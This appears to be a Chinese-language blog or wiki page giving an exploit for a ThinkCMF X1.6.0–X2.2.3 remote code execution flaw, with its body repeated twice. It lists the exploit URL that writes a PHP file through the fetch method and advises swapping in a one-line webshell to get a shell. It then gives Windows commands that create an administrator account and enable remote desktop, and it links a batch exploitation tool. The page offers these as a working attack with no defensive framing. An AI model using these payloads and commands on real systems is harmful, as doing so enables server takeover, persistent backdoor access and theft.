ThinkCMF_X1.6.0-X2.2.3框架任意內容包含漏洞

# ThinkCMF X1.6.0-X2.2.3框架任意內容包含漏洞
= ThinkCMF X1.6.0-X2.2.3框架任意內容包含漏洞 =

==影響版本:==

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

==漏洞利用:==
使用a參數的fetch方法,實現遠程代碼執行
?a=fetch&templateFile=public/index&prefix=''&content=file_put_contents('test.php','')
訪問:
http://127.0.0.1/cmfx/?a=fetch&templateFile=public/index&prefix=''&content=file_put_contents('test.php','')
訪問:
http://127.0.0.1/cmfx/test.php

即可顯示PHPINFO信息。
修改Payload爲一句話木馬即可Getshell。

=====新建用戶並添加到管理員組,開啟遠程桌面連接(對於Windows):=====


net user test test /add

net localgroup administrators test /add

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
= ThinkCMF X1.6.0-X2.2.3框架任意內容包含漏洞 =

==影響版本:==

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

==漏洞利用:==
使用a參數的fetch方法,實現遠程代碼執行
?a=fetch&templateFile=public/index&prefix=''&content=file_put_contents('test.php','')
訪問:
http://127.0.0.1/cmfx/?a=fetch&templateFile=public/index&prefix=''&content=file_put_contents('test.php','')
訪問:
http://127.0.0.1/cmfx/test.php
即可顯示PHPINFO信息。
修改Payload爲一句話木馬即可Getshell。
=====新建用戶並添加到管理員組,開啟遠程桌面連接(對於Windows):=====

net user test test /add
net localgroup administrators test /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

== thinkcmf批量利用工具 ==
[https://github.com/Anonymous-ghost/AttackWebFrameworkTools Thinkcmf批量利用工具]

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容